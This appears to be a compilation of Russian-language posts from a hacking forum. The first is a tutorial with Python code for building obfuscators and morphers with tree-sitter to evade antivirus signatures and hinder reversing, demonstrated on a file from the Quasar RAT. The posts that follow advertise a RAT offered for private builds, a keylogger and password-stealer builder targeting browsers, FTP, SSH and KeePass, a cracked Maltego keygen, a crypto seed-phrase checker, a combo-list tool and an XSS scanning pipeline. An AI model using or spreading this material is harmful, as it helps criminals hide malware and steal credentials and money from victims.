Важно понимать, что tree-sitter — это библиотека, предназначенная исключительно для быстрого парсинга, трансформировать AST-дерево обратно в код она не умеет. Поэтому Rewriter запоминает все правки исходного кода, а затем после посещения всех узлов сортирует и применяет правки к исходному коду. Это простой и быстрый алгоритм, использовать что-то заумнее для tree-sitter’а для меня не представляется возможным и необходимым. У такого подхода есть один недостаток, если вы подменяете какой-то узел, то добавлять правки для дочерних для него узлов не имеет никакого смысла, вы просто останетесь с поломанным кодом в результате. Поэтому, я рекомендую разбить обфускатор на небольшие алгоритмы, которые применяются отдельно друг от друга, но друг за другом. Это мы рассмотрим чуть позднее.
А теперь, давайте приступать к рассмотрению типичных для обфускаторов и морферов алгоритмов трансформации AST-деревьев. Самая простая и очевидная вещь, которую мы могли бы сделать, это — зашифровать строки. Очень часто сигнатурный детект аверов использует константные строки. В примерах я буду показывать, как осуществлять трансформацию кода, а сами алгоритмы обфускации я предлагаю придумать вам самим. Рассмотрим example3.py:
Python:Copy to clipboard
import tree_rewriter
import tree_sitter
class StringEncryptor(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("python")
def visit_string(self, node: tree_sitter.Node):
encrypted = "decryptString(/* encrypted string here */)"
self.replace_node(node, encrypted)
return False
src = '''
def doSomeShit():
string = "I'm a string, bitches!"
doSomeShitWithString("Some other string")
return "Gonna return another string"
'''
print(StringEncryptor().visit(src))
Здесь я реализовал класс StringEncryptor, который заменяет константные строки, которые на языке разработчиков языков программирования часто называют строковыми литералами, но в грамматике Петона их назвали просто «string». Строковые литералы мы зашифровываем и заменяем на вызов функции расшифровки. Это, можно сказать, классика. Не то чтобы нетленная, но не важно. Опять же сам алгоритм шифрования и реализация функции «decryptString» остается за вами:
Code:Copy to clipboard
> python example3.py
def doSomeShit():
string = decryptString(/* encrypted string here */)
doSomeShitWithString(decryptString(/* encrypted string here */))
return decryptString(/* encrypted string here */)
Выглядит все очень просто, но есть нюанс. Дело в том, что являясь библиотекой для парсинга грамматика tree-sitter часто не позволяет получить непосредственное значение строкового литерала, чтобы его можно было удобно и просто зашифровать. Что я имею ввиду? Как насчет ескейп символов в строке? У узла есть свойство text, которое возвращает строку так, как она была написана в исходнике, а не так, как ее понимает язык программирования. Давайте посмотрим на примере example4:
Python:Copy to clipboard
import tree_rewriter
import tree_sitter
class StringEncryptor(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("javascript")
def visit_string(self, node: tree_sitter.Node):
print("unescape:\n", self.unescape(node.text[1:-1]))
print("my_unescape:\n", self.my_unescape(node))
encrypted = "decryptString(/* encrypted string */)"
self.replace_node(node, encrypted)
return False
def my_unescape(self, node: tree_sitter.Node) -> str:
result = ''
for i in range(1, len(node.children) - 1):
child = node.children[i]
if child.type == "string_fragment":
result += child.text.decode()
elif child.type == "escape_sequence":
if child.text == b'\\n': result += '\n'
elif child.text == b'\\t': result += '\t'
elif child.text.startswith(b'\\x'):
byte = child.text[2:4].decode()
result += chr(int(byte, 16))
elif child.text.startswith(b"\\u"):
word = child.text[2:6].decode()
result += chr(int(word, 16))
return result
src = '''
function doSomeShit() {
return "Escaped as fuck, bro: \\n\\t\\x61\\x62\\x63\\x64\\u0410\\u0411\\u0412\\u0413 yo!";
}
'''
#tree_rewriter.Dumper("javascript").visit(src)
print(StringEncryptor().visit(src))
Обратите внимание, что в строке есть разного рода ескейп символы. Разбор строки для каждого языка по хорошему должен быть свой, однако для вас я заботливо реализовал метод escape, который корректно отработает для многих языков программирования, поскольку много где эти эскеп последовательности описываются примерно одинаково. Что делать, если метод escape не тащит нужные вам эскейп символы? Я сделал пример для языка JavaScript в виде метода my_escape. Парсер языка JavaScript разбирает строку, преобразуя ее в последовательность узлов типа string_fragment (фрагмент строки) и escape_sequence (эскейп символ или символы), разбирая эту структуру можно руками составить строку (см. AST-дерево этого кода):
Code:Copy to clipboard
> python example4.py
unescape:
Escaped as fuck, bro:
abcdАБВГ yo!
my_unescape:
Escaped as fuck, bro:
abcdАБВГ yo!
function doSomeShit() {
return decryptString(/* encrypted string */);
}
Дальше чуть больше. Языки со сборщиками мусора и с нормальной реализацией строк — это, конечно, хорошо, но что делать с Цэ и Плюсами. Там же нет сборщика мусора, который подчистит за нами расшифрованную строку. За годы изучения разных обфускаторов и морферов я видел разные подходы. Кто-то просто высирал расшифрованные строки на кучу процесса и никогда не освобождал выделенную таким образом память. Кто-то делал глобальные буферы в секции данных исполняемого файла. Но, наверное, наиболее простым и понятным способом (на мой взгляд) является просто выделить буфер на стеке, но для этого тоже потребуется немножно поработать, смотрим example5:
Python:Copy to clipboard
import tree_rewriter
import tree_sitter
class StringEncryptor(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("cpp")
self._counter = 0
def visit_string_literal(self, node: tree_sitter.Node):
string = node.text.decode()
is_unicode = string.startswith('L')
if is_unicode:
string = self.unescape(string[2:-1])
else: string = self.unescape(string[1:-1])
self._counter += 1
type_name = 'WCHAR' if is_unicode else 'CHAR'
buffer_name = "__buf_{0}".format(self._counter)
buffer_len = len(string) + 1
insert_point = self.find_parent(node, "compound_statement")
insert_point = insert_point.children[1]
decrypt_name = 'DecryptStringW' if is_unicode else 'DecryptStringA'
insert = '{0} {1}[{2}];\n'.format(type_name, buffer_name, buffer_len)
insert += '{0}({1}, /* encrypted */, {2});\n'.format(decrypt_name, buffer_name, buffer_len)
self.insert_before(insert_point, insert)
self.replace_node(node, buffer_name)
return False
src = '''
#include <windows.h>
int main(int argc, char** argv) {
MessageBoxA(NULL, "Hello World!", NULL, MB_OK);
MessageBoxW(NULL, L"Hello World!", NULL, MB_OK);
return 0;
}
'''
#tree_rewriter.Dumper("cpp").visit(src)
print(StringEncryptor().visit(src))
Чтобы определить, куда нам нужно вставить код с выделением буфера на стеке и расшифровки строки, нам нужно найти ближайшего к строковому литералу родителя типа compound_statement (это, условно, блок кода, находящегося между фигурными скобками). Для этого у нас есть метод find_parent. Если у узла нет родителя нужного типа, то метод вернет None, при желании можно сделать проверку на это, а можно и просто упасть в эксепшн. Затем у этого родителя нам нужно взять потомка с индексом 1, так как индекс 0 — это сама фигурная скобка, и вставить перед ним определение буфера и вызов кода для расшифровки строки, а сам строковый литерал мы можем заменить на имя переменной буфера:
Code:Copy to clipboard
> python example5.py
#include <windows.h>
int main(int argc, char** argv) {
CHAR __buf_1[13];
DecryptStringA(__buf_1, /* encrypted */, 13);
WCHAR __buf_2[13];
DecryptStringW(__buf_2, /* encrypted */, 13);
MessageBoxA(NULL, __buf_1, NULL, MB_OK);
MessageBoxW(NULL, __buf_2, NULL, MB_OK);
return 0;
}
Пока я умолчал о ряде других проблем с шифрованием строк в Цэ и Плюсах, но этот код в принципе показывает также, как отличить ANSI-строку от юникода, как получить размер для буфера на стеке и так далее. Элитные разберутся, а мы с вами переходим к следующему примеру. В скриптовых языках при обфускации не забывают о переименовании идентификаторов, чтобы товарищу реверсеру не было так легко жить. Я думаю, что причины этого ясны, давайте рассмотрим example6:
Python:Copy to clipboard
import tree_rewriter
import tree_sitter
class RenameIdentifiers(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("php")
def visit_name(self, node: tree_sitter.Node):
old_name = node.text.decode()
new_name = "new_name_for_{0}".format(old_name)
self.replace_node(node, new_name)
return False
src = '''
<?php
function function1($a, $b) {
return $a + $b;
}
function function2($b, $c) {
return $b - $c;
}
'''
#tree_rewriter.Dumper("php").visit(src)
print(RenameIdentifiers().visit(src))
Здесь для каждого идентификатора (узла name в PHP-парсере) я генерирую демонстративно другое имя. Алгоритмы генерации имен, как минимальных, так и нечитаемых, так и по словарю не являются рокет-саенсом и давно уже есть на гитхабах. Посмотрим, что мы в итоге получили:
Code:Copy to clipboard
> python example6.py
<?php
function new_name_for_function1($new_name_for_a, $new_name_for_b) {
return $new_name_for_a + $new_name_for_b;
}
function new_name_for_function2($new_name_for_b, $new_name_for_c) {
return $new_name_for_b - $new_name_for_c;
}
В следующем примере я взял один файл из исходников ратника Quasar, чтобы показать на примере, как можно разбавлять исходные коды мусорными кодами. Мы просто берем все блоки кода и перед всеми их детишками (кроме комментов) вставляем сгенерированный мусорный код. Ну в моем случае это — просто комментарий, опять же реализацию алгоритма генерации мусорного кода я оставляю за вами:
Python:Copy to clipboard
import tree_rewriter
import tree_sitter
class TrashGenerator(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("c_sharp")
def visit_block(self, node: tree_sitter.Node):
for i in range(1, len(node.children) - 1):
if node.children[i].type == "comment": continue
self.insert_before(node.children[i], self.generate_trash())
def generate_trash(self):
return "/* trash code here */ "
src = '''
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace Quasar.Common.Cryptography
{
public class Aes256
{
private const int KeyLength = 32;
private const int AuthKeyLength = 64;
private const int IvLength = 16;
private const int HmacSha256Length = 32;
private readonly byte[] _key;
private readonly byte[] _authKey;
private static readonly byte[] Salt =
{
0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B, 0xB2, 0x19, 0x2, 0x24, 0x30, 0xA5, 0x78, 0x43, 0x0, 0x3D, 0x56,
0x44, 0xD2, 0x1E, 0x62, 0xB9, 0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41
};
public Aes256(string masterKey)
{
if (string.IsNullOrEmpty(masterKey))
throw new ArgumentException($"{nameof(masterKey)} can not be null or empty.");
using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(masterKey, Salt, 50000))
{
_key = derive.GetBytes(KeyLength);
_authKey = derive.GetBytes(AuthKeyLength);
}
}
public string Encrypt(string input)
{
return Convert.ToBase64String(Encrypt(Encoding.UTF8.GetBytes(input)));
}
/* FORMAT
* ----------------------------------------
* | HMAC | IV | CIPHERTEXT |
* ----------------------------------------
* 32 bytes 16 bytes
*/
public byte[] Encrypt(byte[] input)
{
if (input == null)
throw new ArgumentNullException($"{nameof(input)} can not be null.");
using (var ms = new MemoryStream())
{
ms.Position = HmacSha256Length; // reserve first 32 bytes for HMAC
using (var aesProvider = new AesCryptoServiceProvider())
{
aesProvider.KeySize = 256;
aesProvider.BlockSize = 128;
aesProvider.Mode = CipherMode.CBC;
aesProvider.Padding = PaddingMode.PKCS7;
aesProvider.Key = _key;
aesProvider.GenerateIV();
using (var cs = new CryptoStream(ms, aesProvider.CreateEncryptor(), CryptoStreamMode.Write))
{
ms.Write(aesProvider.IV, 0, aesProvider.IV.Length); // write next 16 bytes the IV, followed by ciphertext
cs.Write(input, 0, input.Length);
cs.FlushFinalBlock();
using (var hmac = new HMACSHA256(_authKey))
{
byte[] hash = hmac.ComputeHash(ms.ToArray(), HmacSha256Length, ms.ToArray().Length - HmacSha256Length); // compute the HMAC of IV and ciphertext
ms.Position = 0; // write hash at beginning
ms.Write(hash, 0, hash.Length);
}
}
}
return ms.ToArray();
}
}
public string Decrypt(string input)
{
return Encoding.UTF8.GetString(Decrypt(Convert.FromBase64String(input)));
}
public byte[] Decrypt(byte[] input)
{
if (input == null)
throw new ArgumentNullException($"{nameof(input)} can not be null.");
using (var ms = new MemoryStream(input))
{
using (var aesProvider = new AesCryptoServiceProvider())
{
aesProvider.KeySize = 256;
aesProvider.BlockSize = 128;
aesProvider.Mode = CipherMode.CBC;
aesProvider.Padding = PaddingMode.PKCS7;
aesProvider.Key = _key;
// read first 32 bytes for HMAC
using (var hmac = new HMACSHA256(_authKey))
{
var hash = hmac.ComputeHash(ms.ToArray(), HmacSha256Length, ms.ToArray().Length - HmacSha256Length);
byte[] receivedHash = new byte[HmacSha256Length];
ms.Read(receivedHash, 0, receivedHash.Length);
if (!SafeComparison.AreEqual(hash, receivedHash))
throw new CryptographicException("Invalid message authentication code (MAC).");
}
byte[] iv = new byte[IvLength];
ms.Read(iv, 0, IvLength); // read next 16 bytes for IV, followed by ciphertext
aesProvider.IV = iv;
using (var cs = new CryptoStream(ms, aesProvider.CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] temp = new byte[ms.Length - IvLength + 1];
byte[] data = new byte[cs.Read(temp, 0, temp.Length)];
Buffer.BlockCopy(temp, 0, data, 0, data.Length);
return data;
}
}
}
}
}
}
'''
#tree_rewriter.Dumper("c_sharp").visit(src)
print(TrashGenerator().visit(src))
Code:Copy to clipboard
> python example7.py
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace Quasar.Common.Cryptography
{
public class Aes256
{
private const int KeyLength = 32;
private const int AuthKeyLength = 64;
private const int IvLength = 16;
private const int HmacSha256Length = 32;
private readonly byte[] _key;
private readonly byte[] _authKey;
private static readonly byte[] Salt =
{
0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B, 0xB2, 0x19, 0x2, 0x24, 0x30, 0xA5, 0x78, 0x43, 0x0, 0x3D, 0x56,
0x44, 0xD2, 0x1E, 0x62, 0xB9, 0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41
};
public Aes256(string masterKey)
{
/* trash code here */ if (string.IsNullOrEmpty(masterKey))
throw new ArgumentException($"{nameof(masterKey)} can not be null or empty.");
/* trash code here */ using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(masterKey, Salt, 50000))
{
/* trash code here */ _key = derive.GetBytes(KeyLength);
/* trash code here */ _authKey = derive.GetBytes(AuthKeyLength);
}
}
public string Encrypt(string input)
{
/* trash code here */ return Convert.ToBase64String(Encrypt(Encoding.UTF8.GetBytes(input)));
}
/* FORMAT
* ----------------------------------------
* | HMAC | IV | CIPHERTEXT |
* ----------------------------------------
* 32 bytes 16 bytes
*/
public byte[] Encrypt(byte[] input)
{
/* trash code here */ if (input == null)
throw new ArgumentNullException($"{nameof(input)} can not be null.");
/* trash code here */ using (var ms = new MemoryStream())
{
/* trash code here */ ms.Position = HmacSha256Length; // reserve first 32 bytes for HMAC
/* trash code here */ using (var aesProvider = new AesCryptoServiceProvider())
{
/* trash code here */ aesProvider.KeySize = 256;
/* trash code here */ aesProvider.BlockSize = 128;
/* trash code here */ aesProvider.Mode = CipherMode.CBC;
/* trash code here */ aesProvider.Padding = PaddingMode.PKCS7;
/* trash code here */ aesProvider.Key = _key;
/* trash code here */ aesProvider.GenerateIV();
/* trash code here */ using (var cs = new CryptoStream(ms, aesProvider.CreateEncryptor(), CryptoStreamMode.Write))
{
/* trash code here */ ms.Write(aesProvider.IV, 0, aesProvider.IV.Length); // write next 16 bytes the IV, followed by ciphertext
/* trash code here */ cs.Write(input, 0, input.Length);
/* trash code here */ cs.FlushFinalBlock();
/* trash code here */ using (var hmac = new HMACSHA256(_authKey))
{
/* trash code here */ byte[] hash = hmac.ComputeHash(ms.ToArray(), HmacSha256Length, ms.ToArray().Length - HmacSha256Length); // compute the HMAC of IV and ciphertext
/* trash code here */ ms.Position = 0; // write hash at beginning
/* trash code here */ ms.Write(hash, 0, hash.Length);
}
}
}
/* trash code here */ return ms.ToArray();
}
}
public string Decrypt(string input)
{
/* trash code here */ return Encoding.UTF8.GetString(Decrypt(Convert.FromBase64String(input)));
}
public byte[] Decrypt(byte[] input)
{
/* trash code here */ if (input == null)
throw new ArgumentNullException($"{nameof(input)} can not be null.");
/* trash code here */ using (var ms = new MemoryStream(input))
{
/* trash code here */ using (var aesProvider = new AesCryptoServiceProvider())
{
/* trash code here */ aesProvider.KeySize = 256;
/* trash code here */ aesProvider.BlockSize = 128;
/* trash code here */ aesProvider.Mode = CipherMode.CBC;
/* trash code here */ aesProvider.Padding = PaddingMode.PKCS7;
/* trash code here */ aesProvider.Key = _key;
// read first 32 bytes for HMAC
/* trash code here */ using (var hmac = new HMACSHA256(_authKey))
{
/* trash code here */ var hash = hmac.ComputeHash(ms.ToArray(), HmacSha256Length, ms.ToArray().Length - HmacSha256Length);
/* trash code here */ byte[] receivedHash = new byte[HmacSha256Length];
/* trash code here */ ms.Read(receivedHash, 0, receivedHash.Length);
/* trash code here */ if (!SafeComparison.AreEqual(hash, receivedHash))
throw new CryptographicException("Invalid message authentication code (MAC).");
}
/* trash code here */ byte[] iv = new byte[IvLength];
/* trash code here */ ms.Read(iv, 0, IvLength); // read next 16 bytes for IV, followed by ciphertext
/* trash code here */ aesProvider.IV = iv;
/* trash code here */ using (var cs = new CryptoStream(ms, aesProvider.CreateDecryptor(), CryptoStreamMode.Read))
{
/* trash code here */ byte[] temp = new byte[ms.Length - IvLength + 1];
/* trash code here */ byte[] data = new byte[cs.Read(temp, 0, temp.Length)];
/* trash code here */ Buffer.BlockCopy(temp, 0, data, 0, data.Length);
/* trash code here */ return data;
}
}
}
}
}
}
Ну и в качестве заключения я расскажу, как мне кажется самым адекватным организовывать архитектуру проектов обфускаторов и морферов. Разделите весь процесс трансформации кода на небольшие проходы, каждый из которых трансформирует код по своему алгоритму. Затем соберите все реализованные алгоритмы в список и примените их друг за другом. Таким образом, например, просто закомментировав алгоритм в списке вы можете его отключить, это становится очень удобным для отладки проблем, когда ваш алгоритм морфинга что- то поломает в исходном коде. Такие ситуации случаются, поверьте мне. Смотрим example8.py:
Python:Copy to clipboard
import tree_rewriter
class StringEncryption(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("language")
# implementation here
class ControlFlowFlattening(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("language")
# implementation here
class TrashGeneration(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("language")
# implementation here
class NamesRenaming(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("language")
# implementation here
class SomeOtherPass1(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("language")
# implementation here
class SomeOtherPass2(tree_rewriter.Rewriter):
def __init__(self):
super().__init__("language")
# implementation here
with open("input_path", "rb") as source_file:
source = source_file.read()
passes = [
StringEncryption(),
ControlFlowFlattening(),
#TrashGeneration(),
NamesRenaming(),
SomeOtherPass1(),
SomeOtherPass2(),
]
for one_pass in passes:
source = one_pass.visit(source)
with open("output_path", "wb") as output_file:
output_file.write(source)
Вот, собственно, и всё. Желаю вам удачи и терпения в изучении алгоритмов обфускации и морфинга кода. Надеюсь, что моя маленькая библиотечка покажется вам удобной и полезной. Если что, репортите баги и задавайте вопросы. Эта статья была написана специально для вас, моего любимого комьюнити xss.is!
Автор: pepe
Источник: xss.is
Представляю вам бота который в автономном режиме может управлять множеством каналов в Telegram.
Бот имеет широкий спектр настроек:
- Авто копирования постов с донорских каналов
- Фильтр сигнатур канала (Авто определение сигнатуры на основе прошлых постов
донора)
- Фильтр дубликатов (если множество доноров делает одинаковы пост - будет фильтровать)
- Фильтр рекламных постов (фильтр по словам и тегам, можно добавлять)
- Фильтр фото ( копирует все кроме фото)
- Фильтр видео (копирует все кроме видео)
- Фильтр альбомов (копирует все кроме альбомов)
- Фильтр текста (копирует медиа)
- Фильтр ссылок/гиперссылок (удаляет из текста)
- Уникализация скопированных постов с помощью ChatGPT (на любых языках)
- Перевод скопированного поста на 8 языков ( уникализиция применяется если включена)
Вы можете управлять неограниченным количество каналов и подключать к каждому каналу неограниченное кол-во доноров как источник потока информации.
Бот использует клиент и апи телеграм, что означает, что копировать посты можно даже с закрытых каналов.
Так же есть блок-лист слов, который можно пополнять с помощью команд в боте.
Можно добавить свою сигнатуру под каждый пост.
Проект написан полностью на Python.
Быстрый запуск с config.py
Управление полностью в Telegram.
Краткое руководство:
0. Настраиваем файл config.py
1. Запускаем бота
2. Добавляем его в наши каналы
3. Подписываемся на каналы откуда будет воровать посты
4. Пересылаем боту сообщение из нашего донора
5. Настраиваем донора как нам угодно
6. Включаем авто постинг
7. Наблюдаем!
До каждого донора и канала можно настроить персональные настройки.
Bablo (Бабло) - это инструмент командной строки, написанный на Go,
предназначенный для кроулинга (crawl).
Github: https://github.com/grozdniyandy/bablo/
Потому что работает рекурсивно.
Эта программа написана на языке программирования Go. Он использует стандартную библиотеку для различных операций и полагается на "colly" для скрепинга (scraping).
Этот инструмент используется для рекурсивного кроулинга данного домена. Я хотел создать XSS-сканер, которому вы просто указываете URL и нажимаете enter, и он выполняет всю работу. Если вы пентестер, вы должны знать, что в BurpSuite есть активный сканер, который может выполнять кроулинг и сканирование на наличие уязвимостей. Так, я решил сделать что-то подобное, но с открытым исходным кодом. Причина, по которой это кроулер, заключается в том, что в будущем его можно будет использовать вместе с другими инструментами и получить отличный результат.
Скорость?
Сами чекните.
Результат?
Продолжайте читать.
Как у каждого инструмента, у этого тоже есть свои минусы:
Значит так, сижу я думаю, как бы после краулинга сделать это эффективным для
находки скажем XSS, вспоминаю инструмент kxss. Но в нём недостатки, так что я
отредактил под нашу нужду. (Инструмент конкурса краулер)
Сперва делайте краулинг с какой скоростью хотите:
Code:Copy to clipboard
./bablo -t 10000 https://example.com > domain1
Потом воспользуйтесь отредактированным kxss. Я просто отредактировал его, чтобы он принимал URL-адреса, таким образом ./kxss {URL} - так будет проще автоматизировать сканирование с большим количеством потоков.
Code:Copy to clipboard
cat domain1 | grep '=' | grep -v 'instagram\|facebook\|twitter\|linkedin\|reddit' | xargs -P1000 -I {} ./kxss '{}' > xss1
Как и то что написанно до этого, инструменты которые я пишу предназначены для массивного использования в основном. Скажем вам нужно просканировать большое кол-во доменов/субдоменов. То это для вас, но про таймаут не забываем.
https://github.com/grozdniyandy/bablo/
Я хочу напомнить вам, что данное программное обеспечение предназначено
только для легального использования.
Нашел уязвимости в ОСНОВНЫХ доменах некоторых мест включая ООН, сообщил им.
Выше я привел один простой пример использования, можно использовать этот инструмент с разными инструментами для находки множества уязвимостей SQLi, SDE и тп
Я задумался над этим, на данный момент из всего что написано мною, этот может монеты принести как раз.
Пацаны, сделайте такой софт, чтобы туда вжух номер кошелька, кнопку клац, трах-теребох, бац-бац, и тебе монеты сыплют... Очень надо))
Click to expand...
Это основные домены, остальные в субдоменах.
XSSMnemo - Чекер Seed фраз BTC на баланс написанный на Python спецально для форума XSS.is
Click to expand...
Spoiler: Функционал
1. Проверка Seed фраз BTC на баланс
2. Запись результатов в txt
3. Многопоточность
4. Подключение прокси
Spoiler: Инструкция
1. Установите Python 3.10
2. Распакуйте архив с программой
3. Запустите Install.bat и дождитесь установки
4. Укажите прокси в файле Proxy.txt в формате log:pass@ip:port (прокси должны
быть http формата IPv4)
5. Запустите Start.bat
6. Перетащите в консоль txt файл с Seed фразами и нажмите Enter
7. Выберете количество потоков (Не стоит ставить 999 или больше чем у вас
есть Seed фраз, нужно ориентироваться на мощность вашего пк)
Теперь просто ждите результатов
Spoiler: Что такое Seed фразы?
Seed фраза - это список, состоящий из 12, 18 или 24 слов. Они нужны для того, чтобы безопасно восстанавливать и заходить в криптокошельки. Списки фраз, из которых состоит Seed фраза, могут отличаться в зависимости от криптовалюты.
Spoiler: Сколько времени я потратил на написание этого кода?
Я потратил 8 часов. Половину времени я потратил на изучение документации к разным библиотекам и выбору более подходящей, 2 часа на написание и 2 часа наблюдал, как мой компьютер лагает с запущенным PyCharm.
Spoiler: Минусы софта
Я не уверен в скорости работы софта, так как мой компьютер медленно работает при любых раскладах. Но по сути потоки работают правильно, и скорость должна быть удовлетворительной. Также я проверял софт только на Seed фразах только Exodus т.к нету возможности проверить с другими, но у всех кошельков BTC один и тот же словарь для генерации Seed фраз, так что должно работать корректно
Spoiler: Будет ли еще чекер Seed фраз, но на другие валюты?
Скорее всего нет. Если вы хотите больше валют и не тратить при этом деньги, то прочитайте документацию к библиотеке bitcoinlib. Она поддерживает работу не только с BTC, но и LTC, DASH, DOGECOIN. Я считаю, что указал достаточно понятно комментарии в коде, так что при желании вы сможете добавить другие валюты сами.
Spoiler: Сколько еще я собрался выпустить бесплатных софтов?
На данный момент я не уверен, что буду выпускать еще бесплатные софты в ближайшее время (по крайней мере, пока не кончится конкурс) по техническим причинам. Какие это причины? Мой 2-ядерный монстр с 6 ГБ ОЗУ не тянет нормальную работу PyCharm и VisualStudio, особенно если они запущены одновременно. Так что серьезные и тяжелые софты мне писать крайне неудобно, а насиловать свои нервные клетки мне пока не хочется. Но я не говорю, что совсем перестану что-то выпускать, я буду, просто чуть попозже, мне нужно отдохнуть от кода.
Spoiler: Ссылка на скачивание проекта
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/1TlD0D4T#KzLnyrK_Ey2RimySVxbXSX7s18stn8NKila2q9ob7ns)
mega.nz
Spoiler: Подарок
В архиве уже будет парочка приватных прокси сроком на 30 дней, для большого количества Seed фраз этого не хватит, но всегда можете просто использовать их в интернет серфинге
Spoiler: Описание
You must have at least 0 reaction(s) to view the content.
Поцы сразу пишу не мое с хайда рф, c кейгеном какие то трабы мб кто поможет разобартся у меня почему то не хочет генерить лицуху пробывал на кали и на вин серваке.
Кейген юзаем через java -jar keygen.jar
с низу где api нужно зайти на вт взять api ключ вставить и указать линк
](https://mega.nz/#P!AgDFzHeRmIC6TS1UOFE_JEj0AtzZ7OC80FZn4kacwzWyC13hsfgrVeqaYokavf2Tv_GsAg2ZKwpqUL86nRAWJvZ1BHRXcs_jRC24coJL8NRc8DZPF7AqgA)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now
mega.nz
pass: raidforums.com
образ швидоувс: <https://maltego-downloads.s3.us-
east-2.amazonaws.com/windows/MaltegoSetup.v4.2.11.13104.exe>
сам образ мальтего шлинукс: <https://maltego-downloads.s3.us-
east-2.amazonaws.com/linux/Maltego.v4.2.11.13104.deb>
Качаем еще 2 файла
](https://anonfiles.com/ReJeM7A7o0/com-paterva-maltego-rest_jar)
![anonfiles.com](/proxy.php?image=https%3A%2F%2Fanonfiles.com%2FReJeM7A7o0%2Fcom- paterva-maltego- rest_jar%2F&hash=a52776cfadc249ad72b516f19867ef0f&return_error=1) anonfiles.com
](https://anonfiles.com/X2J8M3A3o4/com-paterva-maltego-crypto_jar)
![anonfiles.com](/proxy.php?image=https%3A%2F%2Fanonfiles.com%2FX2J8M3A3o4%2Fcom- paterva-maltego- crypto_jar%2F&hash=50e5caa002b548e16368326622f15a54&return_error=1) anonfiles.com
2. Ставим мальту с образа те что выше
3. Переходим на винде C:\Program Files (x86)\Paterva\Maltego\v4.2.11\maltego- core-platform\modules либо линукс /usr/share/maltego/maltego-core- platform/modules/ и заменяем там эти файлы
4.
Жмет оффлайн активация
генерим серийник
Перебрасываем ключ в мальту
с мальты копируем реквест и копируем его в кейген
заполняем инфу ниже и главное API валдиное должно быть
Жмем генерейт ( здесь я хз у меня не робит либо кейген корявый либо еще что то)
добавляем лиц с кейгена в мальту
готово
https://dropmefiles.net/Kz2whUEW пароль xss.is
Hidden content for authorized users.
You must have at least 100 message(s) to view the content.
Склеек нет, автор я.
You must have at least 1 reaction(s) to view the content.
Кому нужны исходники сами достанете, без обфускации все.
Text Utils byGuron - тулза для работы с базами вида email:pass
Работает с любыми размерами файлов.
Все на виду и удобно несмотря на убогий интерфейс.
Hidden content for authorized users.
Начнём с того что автор не позиционирует данный продукт как продукт который
стоит денег.
Автор начал писать данный софт от скуки и сейчас хотел бы поделиться ним на
просторах интернета!
Скорее всего в будущем проект станет официально OPENSOURCE, ну разве что у
автора мозгов прибавиться для исправления всех недочётов.
Функционал не то что-бы скудный, дизайн Вэб-Панели не то что-бы очень красивый.
АВТОР НЕ СОБРАЛСЯ ГОВОРИТЬ ЧТО ЕГО СОФТ ТОП А ВСЁ ОСТАЛЬНОЕ ГОВНО!
АВТОР ПРОСТО ДУМАЕТ ЧТО ДАННЫЙ СОФТ СТОИТ ВНИМАНИЯ ХОТЯ-БЫ АНДРЕЯ ИЗ 9-А!
АВТОР НЕ ЛИНУС ТОРВАЛЬДС, У ЕГО ЗНАНИЙ ТОЖЕ ЕСТЬ ПРИДЕЛ!
Ну а теперь немного о самом софте, пока детектов у софта нету, но автор
знает что вы маленькие тушканчики первым же делом решите этот детект слить)
Как я уже сказал, автор не Линус Торвальдс и потому когда он говорит - "Я могу помочь вам поставить панель на сервер", то это не значит что он вам её купит, или починит проблемы на уже имеющемся хосте!
Малварь достаточно уникальная, связка C# + PHP. Ну как вы догадались у малвари есть Вэб-Панель с херовой тучей SQL инжектов. В будущем всё будет фикситься, если автор конечно захочет)
Ну и что-бы немного заинтересовать аудиторию, несколько скринов в студию!
Прошу не надо писать автору, что консольный вариант управления в панели не сильно устроит тушканчиков что насиделись в своих DarkComet 'ах и DarkCrystal RAT'ах. Автор будет пытаться сделать всё что-бы у таких тушканчиков розорвались жопы)
И ещё, автор пока не сделал билдер и готов всеми правдами и не только
билдить вам билды лично!
Если вы хотите посмотреть на это чудо, то вам нужно перейти на Telegram канал
данного софта(Не реклама)!
Hidden content for authorized users.
Telegram: https://t.me/kernel_rat_project
Ну а я говорю вам пока, потому что автор уже беситься так хочет писать обновление, всем до встречи!
Keylogger password stealer builder
Http троян записывает все, что вводиться с клавиатуры, буфер обмена, пароли, данные передаются на http сервер и складываются в архив.
Собирает пароли от браузеров:
7Star
Amigo
BlackHawk
Brave
Centbrowser
Chedot
Chrome Canary
Chromium
Coccoc
Comodo Dragon
Comodo IceDragon
Cyberfox
Elements Browser
Epic Privacy Browser
Firefox
Google Chrome
Icecat
K-Meleon
Kometa
Opera
Orbitum
Sputnik
Torch
Uran
VivaldiClick to expand...
чатов
Pigdin
Psi
SkypeClick to expand...
баз данных
DBVisualizer
Postgresql
Robomongo
Squirrel
SQLdevelopperClick to expand...
Игры
GalconFusion
Kalypsomedia
RogueTale
TurbaClick to expand...
Git
Git for Windows
Click to expand...
Mails
Outlook
ThunderbirdClick to expand...
Maven Apache
Dumps from memory Keepass
Mimikatz method
Multimedia EyeCON
PHP Composer
SVN Tortoise
Sysadmin
Apache Directory Studio
CoreFTP
CyberDuck
FileZilla
FTPNavigator
OpenSSH
OpenVPN
PuttyCM
RDPManager
VNC
WinSCP
